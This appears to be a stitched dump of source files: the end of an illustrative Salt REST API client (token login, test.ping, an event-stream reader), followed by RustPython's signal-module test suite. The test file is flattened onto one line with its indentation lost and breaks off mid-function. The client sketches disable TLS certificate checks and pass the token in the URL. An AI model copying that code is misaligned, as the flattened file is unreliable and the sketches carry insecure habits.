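    lowstate = [{'client': 'local', 'tgt': '*', 'fun': 'test.ping'}]
    resp = session.post(API_URL, json=lowstate, verify=False,
                        headers={'Accept': 'application/json',
                                 'X-Auth-Token': token})
    resp.raise_for_status()
    return resp.json()['return']


if __name__ == '__main__':  # pragma: no cover - illustration only
    with requests.Session() as session:
        print(run_test_ping(session, login(session)))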
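# --- Illustrative sketch (not part of app.py above) ---
# A hedged example of consuming the /events Server-Sent-Events stream described
# in Events.GET with plain `requests`. The token is passed as a URL parameter,
# which the docstring documents as an option for clients that cannot send the
# X-Auth-Token header; obtain it from /login as sketched above. The URL and
# token values are placeholders.
import json

import requests


def watch_events(api_url='https://localhost:8000', token='<session token>'):
    resp = requests.get(api_url + '/events', params={'token': token},
                        stream=True, verify=False)
    resp.raise_for_status()
    # Each SSE record is a "tag: ..." line, a "data: <json>" line and a blank
    # separator line; only the data lines are deserialized here.
    for line in resp.iter_lines(decode_unicode=True):
        if line and line.startswith('data: '):
            event = json.loads(line[len('data: '):])
            print(event.get('tag'), event.get('data'))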
test_signal.py
import errno import os import random import signal import socket import statistics import subprocess import sys import threading import time import unittest from test import support from test.support.script_helper import assert_python_ok, spawn_python try: import _testcapi except ImportError: _testcapi = None class GenericTests(unittest.TestCase): def test_enums(self): for name in dir(signal): sig = getattr(signal, name) if name in {'SIG_DFL', 'SIG_IGN'}: self.assertIsInstance(sig, signal.Handlers) elif name in {'SIG_BLOCK', 'SIG_UNBLOCK', 'SIG_SETMASK'}: self.assertIsInstance(sig, signal.Sigmasks) elif name.startswith('SIG') and not name.startswith('SIG_'): self.assertIsInstance(sig, signal.Signals) elif name.startswith('CTRL_'): self.assertIsInstance(sig, signal.Signals) self.assertEqual(sys.platform, "win32") @unittest.skipIf(sys.platform == "win32", "Not valid on Windows") class PosixTests(unittest.TestCase): def trivial_signal_handler(self, *args): pass # TODO: RUSTPYTHON @unittest.expectedFailure def test_out_of_range_signal_number_raises_error(self): self.assertRaises(ValueError, signal.getsignal, 4242) self.assertRaises(ValueError, signal.signal, 4242, self.trivial_signal_handler) self.assertRaises(ValueError, signal.strsignal, 4242) def test_setting_signal_handler_to_none_raises_error(self): self.assertRaises(TypeError, signal.signal, signal.SIGUSR1, None) def test_getsignal(self): hup = signal.signal(signal.SIGHUP, self.trivial_signal_handler) self.assertIsInstance(hup, signal.Handlers) self.assertEqual(signal.getsignal(signal.SIGHUP), self.trivial_signal_handler) signal.signal(signal.SIGHUP, hup) self.assertEqual(signal.getsignal(signal.SIGHUP), hup) # TODO: RUSTPYTHON @unittest.expectedFailure def test_strsignal(self): self.assertIn("Interrupt", signal.strsignal(signal.SIGINT)) self.assertIn("Terminated", signal.strsignal(signal.SIGTERM)) self.assertIn("Hangup", signal.strsignal(signal.SIGHUP)) # TODO: RUSTPYTHON @unittest.expectedFailure # Issue 3864, unknown if this affects earlier versions of freebsd also def test_interprocess_signal(self): dirname = os.path.dirname(__file__) script = os.path.join(dirname, 'signalinterproctester.py') assert_python_ok(script) # TODO: RUSTPYTHON @unittest.expectedFailure def test_valid_signals(self): s = signal.valid_signals() self.assertIsInstance(s, set) self.assertIn(signal.Signals.SIGINT, s) self.assertIn(signal.Signals.SIGALRM, s) self.assertNotIn(0, s) self.assertNotIn(signal.NSIG, s) self.assertLess(len(s), signal.NSIG) # TODO: RUSTPYTHON @unittest.expectedFailure @unittest.skipUnless(sys.executable, "sys.executable required.") def test_keyboard_interrupt_exit_code(self): """KeyboardInterrupt triggers exit via SIGINT.""" process = subprocess.run( [sys.executable, "-c", "import os, signal, time\n" "os.kill(os.getpid(), signal.SIGINT)\n" "for _ in range(999): time.sleep(0.01)"], stderr=subprocess.PIPE) self.assertIn(b"KeyboardInterrupt", process.stderr) self.assertEqual(process.returncode, -signal.SIGINT) # Caveat: The exit code is insufficient to guarantee we actually died # via a signal. POSIX shells do more than look at the 8 bit value. # Writing an automation friendly test of an interactive shell # to confirm that our process died via a SIGINT proved too complex. 
@unittest.skipUnless(sys.platform == "win32", "Windows specific") class WindowsSignalTests(unittest.TestCase): # TODO: RUSTPYTHON @unittest.expectedFailure def test_valid_signals(self): s = signal.valid_signals() self.assertIsInstance(s, set) self.assertGreaterEqual(len(s), 6) self.assertIn(signal.Signals.SIGINT, s) self.assertNotIn(0, s) self.assertNotIn(signal.NSIG, s) self.assertLess(len(s), signal.NSIG) # TODO: RUSTPYTHON @unittest.expectedFailure def test_issue9324(self): # Updated for issue #10003, adding SIGBREAK handler = lambda x, y: None checked = set() for sig in (signal.SIGABRT, signal.SIGBREAK, signal.SIGFPE, signal.SIGILL, signal.SIGINT, signal.SIGSEGV, signal.SIGTERM): # Set and then reset a handler for signals that work on windows. # Issue #18396, only for signals without a C-level handler. if signal.getsignal(sig) is not None: signal.signal(sig, signal.signal(sig, handler)) checked.add(sig) # Issue #18396: Ensure the above loop at least tested *something* self.assertTrue(checked) with self.assertRaises(ValueError): signal.signal(-1, handler) with self.assertRaises(ValueError): signal.signal(7, handler) # TODO: RUSTPYTHON @unittest.expectedFailure @unittest.skipUnless(sys.executable, "sys.executable required.") def test_keyboard_interrupt_exit_code(self): """KeyboardInterrupt triggers an exit using STATUS_CONTROL_C_EXIT.""" # We don't test via os.kill(os.getpid(), signal.CTRL_C_EVENT) here # as that requires setting up a console control handler in a child # in its own process group. Doable, but quite complicated. (see # @eryksun on https://github.com/python/cpython/pull/11862) process = subprocess.run( [sys.executable, "-c", "raise KeyboardInterrupt"], stderr=subprocess.PIPE) self.assertIn(b"KeyboardInterrupt", process.stderr) STATUS_CONTROL_C_EXIT = 0xC000013A self.assertEqual(process.returncode, STATUS_CONTROL_C_EXIT) class WakeupFDTests(unittest.TestCase): def test_invalid_call(self): # First parameter is positional-only with self.assertRaises(TypeError): signal.set_wakeup_fd(signum=signal.SIGINT) # warn_on_full_buffer is a keyword-only parameter with self.assertRaises(TypeError): signal.set_wakeup_fd(signal.SIGINT, False) def test_invalid_fd(self): fd = support.make_bad_fd() self.assertRaises((ValueError, OSError), signal.set_wakeup_fd, fd) # TODO: RUSTPYTHON if sys.platform == "win32": test_invalid_fd = unittest.expectedFailure(test_invalid_fd) def test_invalid_socket(self): sock = socket.socket() fd = sock.fileno() sock.close() self.assertRaises((ValueError, OSError), signal.set_wakeup_fd, fd) # TODO: RUSTPYTHON if sys.platform == "win32": test_invalid_socket = unittest.expectedFailure(test_invalid_socket) def test_set_wakeup_fd_result(self): r1, w1 = os.pipe() self.addCleanup(os.close, r1) self.addCleanup(os.close, w1) r2, w2 = os.pipe() self.addCleanup(os.close, r2) self.addCleanup(os.close, w2) if hasattr(os, 'set_blocking'): os.set_blocking(w1, False) os.set_blocking(w2, False) signal.set_wakeup_fd(w1) self.assertEqual(signal.set_wakeup_fd(w2), w1) self.assertEqual(signal.set_wakeup_fd(-1), w2) self.assertEqual(signal.set_wakeup_fd(-1), -1) # TODO: RUSTPYTHON if sys.platform == "win32": test_set_wakeup_fd_result = unittest.expectedFailure(test_set_wakeup_fd_result) def test_set_wakeup_fd_socket_result(self): sock1 = socket.socket() self.addCleanup(sock1.close) sock1.setblocking(False) fd1 = sock1.fileno() sock2 = socket.socket() self.addCleanup(sock2.close) sock2.setblocking(False) fd2 = sock2.fileno() signal.set_wakeup_fd(fd1) 
self.assertEqual(signal.set_wakeup_fd(fd2), fd1) self.assertEqual(signal.set_wakeup_fd(-1), fd2) self.assertEqual(signal.set_wakeup_fd(-1), -1) # TODO: RUSTPYTHON if sys.platform == "win32": test_set_wakeup_fd_socket_result = unittest.expectedFailure(test_set_wakeup_fd_socket_result) # On Windows, files are always blocking and Windows does not provide a # function to test if a socket is in non-blocking mode. @unittest.skipIf(sys.platform == "win32", "tests specific to POSIX") def test_set_wakeup_fd_blocking(self): rfd, wfd = os.pipe() self.addCleanup(os.close, rfd) self.addCleanup(os.close, wfd) # fd must be non-blocking os.set_blocking(wfd, True) with self.assertRaises(ValueError) as cm: signal.set_wakeup_fd(wfd) self.assertEqual(str(cm.exception), "the fd %s must be in non-blocking mode" % wfd) # non-blocking is ok os.set_blocking(wfd, False) signal.set_wakeup_fd(wfd) signal.set_wakeup_fd(-1) @unittest.skipIf(sys.platform == "win32", "Not valid on Windows") class WakeupSignalTests(unittest.TestCase): @unittest.skipIf(_testcapi is None, 'need _testcapi') def check_wakeup(self, test_body, *signals, ordered=True): # use a subprocess to have only one thread code = """if 1: import _testcapi import os import signal import struct signals = {!r} def handler(signum, frame): pass def check_signum(signals): data = os.read(read, len(signals)+1) raised = struct.unpack('%uB' % len(data), data) if not {!r}: raised = set(raised) signals = set(signals) if raised != signals: raise Exception("%r != %r" % (raised, signals)) {} signal.signal(signal.SIGALRM, handler) read, write = os.pipe() os.set_blocking(write, False) signal.set_wakeup_fd(write) test() check_signum(signals) os.close(read) os.close(write) """.format(tuple(map(int, signals)), ordered, test_body) assert_python_ok('-c', code) @unittest.skipIf(_testcapi is None, 'need _testcapi') def test_wakeup_write_error(self): # Issue #16105: write() errors in the C signal handler should not # pass silently. # Use a subprocess to have only one thread. 
code = """if 1: import _testcapi import errno import os import signal import sys from test.support import captured_stderr def handler(signum, frame): 1/0 signal.signal(signal.SIGALRM, handler) r, w = os.pipe() os.set_blocking(r, False) # Set wakeup_fd a read-only file descriptor to trigger the error signal.set_wakeup_fd(r) try: with captured_stderr() as err: signal.raise_signal(signal.SIGALRM) except ZeroDivisionError: # An ignored exception should have been printed out on stderr err = err.getvalue() if ('Exception ignored when trying to write to the signal wakeup fd' not in err): raise AssertionError(err) if ('OSError: [Errno %d]' % errno.EBADF) not in err: raise AssertionError(err) else: raise AssertionError("ZeroDivisionError not raised") os.close(r) os.close(w) """ r, w = os.pipe() try: os.write(r, b'x') except OSError: pass else: self.skipTest("OS doesn't report write() error on the read end of a pipe") finally: os.close(r) os.close(w) assert_python_ok('-c', code) def test_wakeup_fd_early(self): self.check_wakeup("""def test(): import select import time TIMEOUT_FULL = 10 TIMEOUT_HALF = 5 class InterruptSelect(Exception): pass def handler(signum, frame): raise InterruptSelect signal.signal(signal.SIGALRM, handler) signal.alarm(1) # We attempt to get a signal during the sleep, # before select is called try: select.select([], [], [], TIMEOUT_FULL) except InterruptSelect: pass else: raise Exception("select() was not interrupted") before_time = time.monotonic() select.select([read], [], [], TIMEOUT_FULL) after_time = time.monotonic() dt = after_time - before_time if dt >= TIMEOUT_HALF: raise Exception("%s >= %s" % (dt, TIMEOUT_HALF)) """, signal.SIGALRM) def test_wakeup_fd_during(self): self.check_wakeup("""def test(): import select import time TIMEOUT_FULL = 10 TIMEOUT_HALF = 5 class InterruptSelect(Exception): pass def handler(signum, frame): raise InterruptSelect signal.signal(signal.SIGALRM, handler) signal.alarm(1) before_time = time.monotonic() # We attempt to get a signal during the select call try: select.select([read], [], [], TIMEOUT_FULL) except InterruptSelect: pass else: raise Exception("select() was not interrupted") after_time = time.monotonic() dt = after_time - before_time if dt >= TIMEOUT_HALF: raise Exception("%s >= %s" % (dt, TIMEOUT_HALF)) """, signal.SIGALRM) def test_signum(self): self.check_wakeup("""def test(): signal.signal(signal.SIGUSR1, handler) signal.raise_signal(signal.SIGUSR1) signal.raise_signal(signal.SIGALRM) """, signal.SIGUSR1, signal.SIGALRM) @unittest.skipUnless(hasattr(signal, 'pthread_sigmask'), 'need signal.pthread_sigmask()') def test_pending(self): self.check_wakeup("""def test(): signum1 = signal.SIGUSR1 signum2 = signal.SIGUSR2 signal.signal(signum1, handler) signal.signal(signum2, handler) signal.pthread_sigmask(signal.SIG_BLOCK, (signum1, signum2)) signal.raise_signal(signum1) signal.raise_signal(signum2) # Unblocking the 2 signals calls the C signal handler twice signal.pthread_sigmask(signal.SIG_UNBLOCK, (signum1, signum2)) """, signal.SIGUSR1, signal.SIGUSR2, ordered=False) @unittest.skipUnless(hasattr(socket, 'socketpair'), 'need socket.socketpair') class WakeupSocketSignalTests(unittest.TestCase): @unittest.skipIf(_testcapi is None, 'need _testcapi') def test_socket(self): # use a subprocess to have only one thread code = """if 1: import signal import socket import struct import _testcapi signum = signal.SIGINT signals = (signum,) def handler(signum, frame): pass signal.signal(signum, handler) read, write = socket.socketpair() 
write.setblocking(False) signal.set_wakeup_fd(write.fileno()) signal.raise_signal(signum) data = read.recv(1) if not data: raise Exception("no signum written") raised = struct.unpack('B', data) if raised != signals: raise Exception("%r != %r" % (raised, signals)) read.close() write.close() """ assert_python_ok('-c', code) @unittest.skipIf(_testcapi is None, 'need _testcapi') def test_send_error(self): # Use a subprocess to have only one thread. if os.name == 'nt': action = 'send' else: action = 'write' code = """if 1: import errno import signal import socket import sys import time import _testcapi from test.support import captured_stderr signum = signal.SIGINT def handler(signum, frame): pass signal.signal(signum, handler) read, write = socket.socketpair() read.setblocking(False) write.setblocking(False) signal.set_wakeup_fd(write.fileno()) # Close sockets: send() will fail read.close() write.close() with captured_stderr() as err: signal.raise_signal(signum) err = err.getvalue() if ('Exception ignored when trying to {action} to the signal wakeup fd' not in err): raise AssertionError(err) """.format(action=action) assert_python_ok('-c', code) @unittest.skipIf(_testcapi is None, 'need _testcapi') def test_warn_on_full_buffer(self): # Use a subprocess to have only one thread. if os.name == 'nt': action = 'send' else: action = 'write' code = """if 1: import errno import signal import socket import sys import time import _testcapi from test.support import captured_stderr signum = signal.SIGINT # This handler will be called, but we intentionally won't read from # the wakeup fd. def handler(signum, frame): pass signal.signal(signum, handler) read, write = socket.socketpair() # Fill the socketpair buffer if sys.platform == 'win32': # bpo-34130: On Windows, sometimes non-blocking send fails to fill # the full socketpair buffer, so use a timeout of 50 ms instead. write.settimeout(0.050) else: write.setblocking(False) # Start with large chunk size to reduce the # number of send needed to fill the buffer. written = 0 for chunk_size in (2 ** 16, 2 ** 8, 1): chunk = b"x" * chunk_size try: while True: write.send(chunk) written += chunk_size except (BlockingIOError, socket.timeout): pass print(f"%s bytes written into the socketpair" % written, flush=True) write.setblocking(False) try: write.send(b"x") except BlockingIOError: # The socketpair buffer seems full pass else: raise AssertionError("%s bytes failed to fill the socketpair " "buffer" % written) # By default, we get a warning when a signal arrives msg = ('Exception ignored when trying to {action} ' 'to the signal wakeup fd') signal.set_wakeup_fd(write.fileno()) with captured_stderr() as err: signal.raise_signal(signum) err = err.getvalue() if msg not in err: raise AssertionError("first set_wakeup_fd() test failed, " "stderr: %r" % err) # And also if warn_on_full_buffer=True signal.set_wakeup_fd(write.fileno(), warn_on_full_buffer=True) with captured_stderr() as err: signal.raise_signal(signum) err = err.getvalue() if msg not in err: raise AssertionError("set_wakeup_fd(warn_on_full_buffer=True) " "test failed, stderr: %r" % err) # But not if warn_on_full_buffer=False signal.set_wakeup_fd(write.fileno(), warn_on_full_buffer=False) with captured_stderr() as err: signal.raise_signal(signum) err = err.getvalue() if err != "": raise AssertionError("set_wakeup_fd(warn_on_full_buffer=False) " "test failed, stderr: %r" % err) # And then check the default again, to make sure warn_on_full_buffer # settings don't leak across calls. 
signal.set_wakeup_fd(write.fileno()) with captured_stderr() as err: signal.raise_signal(signum) err = err.getvalue() if msg not in err: raise AssertionError("second set_wakeup_fd() test failed, " "stderr: %r" % err) """.format(action=action) assert_python_ok('-c', code) @unittest.skipIf(sys.platform == "win32", "Not valid on Windows") class SiginterruptTest(unittest.TestCase): def readpipe_interrupted(self, interrupt): """Perform a read during which a signal will arrive. Return True if the read is interrupted by the signal and raises an exception. Return False if it returns normally. """ # use a subprocess to have only one thread, to have a timeout on the # blocking read and to not touch signal handling in this process code = """if 1: import errno import os import signal import sys interrupt = %r r, w = os.pipe() def handler(signum, frame): 1 / 0 signal.signal(signal.SIGALRM, handler) if interrupt is not None: signal.siginterrupt(signal.SIGALRM, interrupt) print("ready") sys.stdout.flush() # run the test twice try: for loop in range(2): # send a SIGALRM in a second (during the read) signal.alarm(1) try: # blocking call: read from a pipe without data os.read(r, 1) except ZeroDivisionError: pass else: sys.exit(2) sys.exit(3) finally: os.close(r) os.close(w) """ % (interrupt,) with spawn_python('-c', code) as process: try: # wait until the child process is loaded and has started first_line = process.stdout.readline() stdout, stderr = process.communicate(timeout=5.0) except subprocess.TimeoutExpired: process.kill() return False else: stdout = first_line + stdout exitcode = process.wait() if exitcode not in (2, 3): raise Exception("Child error (exit code %s): %r" % (exitcode, stdout)) return (exitcode == 3) # TODO: RUSTPYTHON @unittest.expectedFailure def test_without_siginterrupt(self): # If a signal handler is installed and siginterrupt is not called # at all, when that signal arrives, it interrupts a syscall that's in # progress. interrupted = self.readpipe_interrupted(None) self.assertTrue(interrupted) # TODO: RUSTPYTHON @unittest.expectedFailure def test_siginterrupt_on(self): # If a signal handler is installed and siginterrupt is called with # a true value for the second argument, when that signal arrives, it # interrupts a syscall that's in progress. interrupted = self.readpipe_interrupted(True) self.assertTrue(interrupted) def test_siginterrupt_off(self): # If a signal handler is installed and siginterrupt is called with # a false value for the second argument, when that signal arrives, it # does not interrupt a syscall that's in progress. interrupted = self.readpipe_interrupted(False) self.assertFalse(interrupted) @unittest.skipIf(sys.platform == "win32", "Not valid on Windows") class ItimerTest(unittest.TestCase): def setUp(self): self.hndl_called = False self.hndl_count = 0 self.itimer = None self.old_alarm = signal.signal(signal.SIGALRM, self.sig_alrm) def tearDown(self): signal.signal(signal.SIGALRM, self.old_alarm) if self.itimer is not None: # test_itimer_exc doesn't change this attr # just ensure that itimer is stopped signal.setitimer(self.itimer, 0) def sig_alrm(self, *args): self.hndl_called = True def sig_vtalrm(self, *args): self.hndl_called = True if self.hndl_count > 3: # it shouldn't be here, because it should have been disabled. 
raise signal.ItimerError("setitimer didn't disable ITIMER_VIRTUAL " "timer.") elif self.hndl_count == 3: # disable ITIMER_VIRTUAL, this function shouldn't be called anymore signal.setitimer(signal.ITIMER_VIRTUAL, 0) self.hndl_count += 1 def sig_prof(self, *args): self.hndl_called = True signal.setitimer(signal.ITIMER_PROF, 0) # TODO: RUSTPYTHON @unittest.expectedFailure def test_itimer_exc(self): # XXX I'm assuming -1 is an invalid itimer, but maybe some platform # defines it ? self.assertRaises(signal.ItimerError, signal.setitimer, -1, 0) # Negative times are treated as zero on some platforms. if 0: self.assertRaises(signal.ItimerError, signal.setitimer, signal.ITIMER_REAL, -1) # TODO: RUSTPYTHON @unittest.expectedFailure def test_itimer_real(self): self.itimer = signal.ITIMER_REAL signal.setitimer(self.itimer, 1.0) signal.pause() self.assertEqual(self.hndl_called, True) # TODO: RUSTPYTHON @unittest.expectedFailure # Issue 3864, unknown if this affects earlier versions of freebsd also @unittest.skipIf(sys.platform in ('netbsd5',), 'itimer not reliable (does not mix well with threading) on some BSDs.') def test_itimer_virtual(self): self.itimer = signal.ITIMER_VIRTUAL signal.signal(signal.SIGVTALRM, self.sig_vtalrm) signal.setitimer(self.itimer, 0.3, 0.2) start_time = time.monotonic() while time.monotonic() - start_time < 60.0: # use up some virtual time by doing real work _ = pow(12345, 67890, 10000019) if signal.getitimer(self.itimer) == (0.0, 0.0): break # sig_vtalrm handler stopped this itimer else: # Issue 8424 self.skipTest("timeout: likely cause: machine too slow or load too " "high") # virtual itimer should be (0.0, 0.0) now self.assertEqual(signal.getitimer(self.itimer), (0.0, 0.0)) # and the handler should have been called self.assertEqual(self.hndl_called, True) # TODO: RUSTPYTHON @unittest.expectedFailure def test_itimer_prof(self): self.itimer = signal.ITIMER_PROF signal.signal(signal.SIGPROF, self.sig_prof) signal.setitimer(self.itimer, 0.2, 0.2) start_time = time.monotonic() while time.monotonic() - start_time < 60.0: # do some work _ = pow(12345, 67890, 10000019) if signal.getitimer(self.itimer) == (0.0, 0.0): break # sig_prof handler stopped this itimer else: # Issue 8424 self.skipTest("timeout: likely cause: machine too slow or load too " "high") # profiling itimer should be (0.0, 0.0) now self.assertEqual(signal.getitimer(self.itimer), (0.0, 0.0)) # and the handler should have been called self.assertEqual(self.hndl_called, True) # TODO: RUSTPYTHON @unittest.expectedFailure def test_setitimer_tiny(self): # bpo-30807: C setitimer() takes a microsecond-resolution interval. # Check that float -> timeval conversion doesn't round # the interval down to zero, which would disable the timer. self.itimer = signal.ITIMER_REAL signal.setitimer(self.itimer, 1e-6) time.sleep(1) self.assertEqual(self.hndl_called, True) class PendingSignalsTests(unittest.TestCase): """ Test pthread_sigmask(), pthread_kill(), sigpending() and sigwait() functions. 
""" @unittest.skipUnless(hasattr(signal, 'sigpending'), 'need signal.sigpending()') def test_sigpending_empty(self): self.assertEqual(signal.sigpending(), set()) @unittest.skipUnless(hasattr(signal, 'pthread_sigmask'), 'need signal.pthread_sigmask()') @unittest.skipUnless(hasattr(signal, 'sigpending'), 'need signal.sigpending()') def test_sigpending(self): code = """if 1: import os import signal def handler(signum, frame): 1/0 signum = signal.SIGUSR1 signal.signal(signum, handler) signal.pthread_sigmask(signal.SIG_BLOCK, [signum]) os.kill(os.getpid(), signum) pending = signal.sigpending() for sig in pending: assert isinstance(sig, signal.Signals), repr(pending) if pending != {signum}: raise Exception('%s != {%s}' % (pending, signum)) try: signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum]) except ZeroDivisionError: pass else: raise Exception("ZeroDivisionError not raised") """ assert_python_ok('-c', code) @unittest.skipUnless(hasattr(signal, 'pthread_kill'), 'need signal.pthread_kill()') def test_pthread_kill(self): code = """if 1: import signal import threading import sys signum = signal.SIGUSR1 def handler(signum, frame): 1/0 signal.signal(signum, handler) tid = threading.get_ident() try: signal.pthread_kill(tid, signum) except ZeroDivisionError: pass else: raise Exception("ZeroDivisionError not raised") """ assert_python_ok('-c', code) @unittest.skipUnless(hasattr(signal, 'pthread_sigmask'), 'need signal.pthread_sigmask()') def wait_helper(self, blocked, test): """ test: body of the "def test(signum):" function. blocked: number of the blocked signal """ code = '''if 1: import signal import sys from signal import Signals def handler(signum, frame): 1/0 %s blocked = %s signum = signal.SIGALRM # child: block and wait the signal try: signal.signal(signum, handler) signal.pthread_sigmask(signal.SIG_BLOCK, [blocked]) # Do the tests test(signum) # The handler must not be called on unblock try: signal.pthread_sigmask(signal.SIG_UNBLOCK, [blocked]) except ZeroDivisionError: print("the signal handler has been called", file=sys.stderr) sys.exit(1) except BaseException as err: print("error: {}".format(err), file=sys.stderr) sys.stderr.flush() sys.exit(1) ''' % (test.strip(), blocked) # sig*wait* must be called with the signal blocked: since the current # process might have several threads running, use a subprocess to have # a single thread. 
assert_python_ok('-c', code) @unittest.skipUnless(hasattr(signal, 'sigwait'), 'need signal.sigwait()') def test_sigwait(self): self.wait_helper(signal.SIGALRM, ''' def test(signum): signal.alarm(1) received = signal.sigwait([signum]) assert isinstance(received, signal.Signals), received if received != signum: raise Exception('received %s, not %s' % (received, signum)) ''') @unittest.skipUnless(hasattr(signal, 'sigwaitinfo'), 'need signal.sigwaitinfo()') def test_sigwaitinfo(self): self.wait_helper(signal.SIGALRM, ''' def test(signum): signal.alarm(1) info = signal.sigwaitinfo([signum]) if info.si_signo != signum: raise Exception("info.si_signo != %s" % signum) ''') @unittest.skipUnless(hasattr(signal, 'sigtimedwait'), 'need signal.sigtimedwait()') def test_sigtimedwait(self): self.wait_helper(signal.SIGALRM, ''' def test(signum): signal.alarm(1) info = signal.sigtimedwait([signum], 10.1000) if info.si_signo != signum: raise Exception('info.si_signo != %s' % signum) ''') @unittest.skipUnless(hasattr(signal, 'sigtimedwait'), 'need signal.sigtimedwait()') def test_sigtimedwait_poll(self): # check that polling with sigtimedwait works self.wait_helper(signal.SIGALRM, ''' def test(signum): import os os.kill(os.getpid(), signum) info = signal.sigtimedwait([signum], 0) if info.si_signo != signum: raise Exception('info.si_signo != %s' % signum) ''') @unittest.skipUnless(hasattr(signal, 'sigtimedwait'), 'need signal.sigtimedwait()') def test_sigtimedwait_timeout(self): self.wait_helper(signal.SIGALRM, ''' def test(signum): received = signal.sigtimedwait([signum], 1.0) if received is not None: raise Exception("received=%r" % (received,)) ''') @unittest.skipUnless(hasattr(signal, 'sigtimedwait'), 'need signal.sigtimedwait()') def test_sigtimedwait_negative_timeout(self): signum = signal.SIGALRM self.assertRaises(ValueError, signal.sigtimedwait, [signum], -1.0) @unittest.skipUnless(hasattr(signal, 'sigwait'), 'need signal.sigwait()') @unittest.skipUnless(hasattr(signal, 'pthread_sigmask'), 'need signal.pthread_sigmask()') def test_sigwait_thread(self): # Check that calling sigwait() from a thread doesn't suspend the whole # process. A new interpreter is spawned to avoid problems when mixing # threads and fork(): only async-safe functions are allowed between # fork() and exec(). 
assert_python_ok("-c", """if True: import os, threading, sys, time, signal # the default handler terminates the process signum = signal.SIGUSR1 def kill_later(): # wait until the main thread is waiting in sigwait() time.sleep(1) os.kill(os.getpid(), signum) # the signal must be blocked by all the threads signal.pthread_sigmask(signal.SIG_BLOCK, [signum]) killer = threading.Thread(target=kill_later) killer.start() received = signal.sigwait([signum]) if received != signum: print("sigwait() received %s, not %s" % (received, signum), file=sys.stderr) sys.exit(1) killer.join() # unblock the signal, which should have been cleared by sigwait() signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum]) """) @unittest.skipUnless(hasattr(signal, 'pthread_sigmask'), 'need signal.pthread_sigmask()') def test_pthread_sigmask_arguments(self): self.assertRaises(TypeError, signal.pthread_sigmask) self.assertRaises(TypeError, signal.pthread_sigmask, 1) self.assertRaises(TypeError, signal.pthread_sigmask, 1, 2, 3) self.assertRaises(OSError, signal.pthread_sigmask, 1700, []) with self.assertRaises(ValueError): signal.pthread_sigmask(signal.SIG_BLOCK, [signal.NSIG]) with self.assertRaises(ValueError): signal.pthread_sigmask(signal.SIG_BLOCK, [0]) with self.assertRaises(ValueError): signal.pthread_sigmask(signal.SIG_BLOCK, [1<<1000]) @unittest.skipUnless(hasattr(signal, 'pthread_sigmask'), 'need signal.pthread_sigmask()') def test_pthread_sigmask_valid_signals(self): s = signal.pthread_sigmask(signal.SIG_BLOCK, signal.valid_signals()) self.addCleanup(signal.pthread_sigmask, signal.SIG_SETMASK, s) # Get current blocked set s = signal.pthread_sigmask(signal.SIG_UNBLOCK, signal.valid_signals()) self.assertLessEqual(s, signal.valid_signals()) @unittest.skipUnless(hasattr(signal, 'pthread_sigmask'), 'need signal.pthread_sigmask()') def test_pthread_sigmask(self): code = """if 1: import signal import os; import threading def handler(signum, frame): 1/0 def kill(signum): os.kill(os.getpid(), signum) def check_mask(mask): for sig in mask: assert isinstance(sig, signal.Signals), repr(sig) def read_sigmask(): sigmask = signal.pthread_sigmask(signal.SIG_BLOCK, []) check_mask(sigmask) return sigmask signum = signal.SIGUSR1 # Install our signal handler old_handler = signal.signal(signum, handler) # Unblock SIGUSR1 (and copy the old mask) to test our signal handler old_mask = signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum]) check_mask(old_mask) try: kill(signum) except ZeroDivisionError: pass else: raise Exception("ZeroDivisionError not raised") # Block and then raise SIGUSR1. 
The signal is blocked: the signal # handler is not called, and the signal is now pending mask = signal.pthread_sigmask(signal.SIG_BLOCK, [signum]) check_mask(mask) kill(signum) # Check the new mask blocked = read_sigmask() check_mask(blocked) if signum not in blocked: raise Exception("%s not in %s" % (signum, blocked)) if old_mask ^ blocked != {signum}: raise Exception("%s ^ %s != {%s}" % (old_mask, blocked, signum)) # Unblock SIGUSR1 try: # unblock the pending signal calls immediately the signal handler signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum]) except ZeroDivisionError: pass else: raise Exception("ZeroDivisionError not raised") try: kill(signum) except ZeroDivisionError: pass else: raise Exception("ZeroDivisionError not raised") # Check the new mask unblocked = read_sigmask() if signum in unblocked: raise Exception("%s in %s" % (signum, unblocked)) if blocked ^ unblocked != {signum}: raise Exception("%s ^ %s != {%s}" % (blocked, unblocked, signum)) if old_mask != unblocked: raise Exception("%s != %s" % (old_mask, unblocked)) """ assert_python_ok('-c', code) @unittest.skipUnless(hasattr(signal, 'pthread_kill'), 'need signal.pthread_kill()') def test_pthread_kill_main_thread(self): # Test that a signal can be sent to the main thread with pthread_kill() # before any other thread has been created (see issue #12392). code = """if True: import threading import signal import sys def handler(signum, frame): sys.exit(3) signal.signal(signal.SIGUSR1, handler) signal.pthread_kill(threading.get_ident(), signal.SIGUSR1) sys.exit(2) """ with spawn_python('-c', code) as process: stdout, stderr = process.communicate() exitcode = process.wait() if exitcode != 3: raise Exception("Child error (exit code %s): %s" % (exitcode, stdout)) class StressTest(unittest.TestCase): """ Stress signal delivery, especially when a signal arrives in the middle of recomputing the signal state or executing previously tripped signal handlers. """ def setsig(self, signum, handler): old_handler = signal.signal(signum, handler) self.addCleanup(signal.signal, signum, old_handler) def measure_itimer_resolution(self): N = 20 times = [] def handler(signum=None, frame=None): if len(times) < N: times.append(time.perf_counter()) # 1 µs is the smallest possible timer interval, # we want to measure what the concrete duration # will be on this platform signal.setitimer(signal.ITIMER_REAL, 1e-6) self.addCleanup(signal.setitimer, signal.ITIMER_REAL, 0) self.setsig(signal.SIGALRM, handler) handler() while len(times) < N: time.sleep(1e-3) durations = [times[i+1] - times[i] for i in range(len(times) - 1)] med = statistics.median(durations) if support.verbose: print("detected median itimer() resolution: %.6f s." % (med,)) return med def decide_itimer_count(self): # Some systems have poor setitimer() resolution (for example # measured around 20 ms. on FreeBSD 9), so decide on a reasonable # number of sequential timers based on that. reso = self.measure_itimer_resolution() if reso <= 1e-4: return 10000 elif reso <= 1e-2: return 100 else: self.skipTest("detected itimer resolution (%.3f s.) too high " "(> 10 ms.) on this platform (or system too busy)" % (reso,)) @unittest.skipUnless(hasattr(signal, "setitimer"), "test needs setitimer()") def test_stress_delivery_dependent(self): """ This test uses dependent signal handlers. """ N = self.decide_itimer_count() sigs = [] def first_handler(signum, frame): # 1e-6 is the minimum non-zero value for `setitimer()`. # Choose a random delay so as to improve chances of # triggering a race condition. 
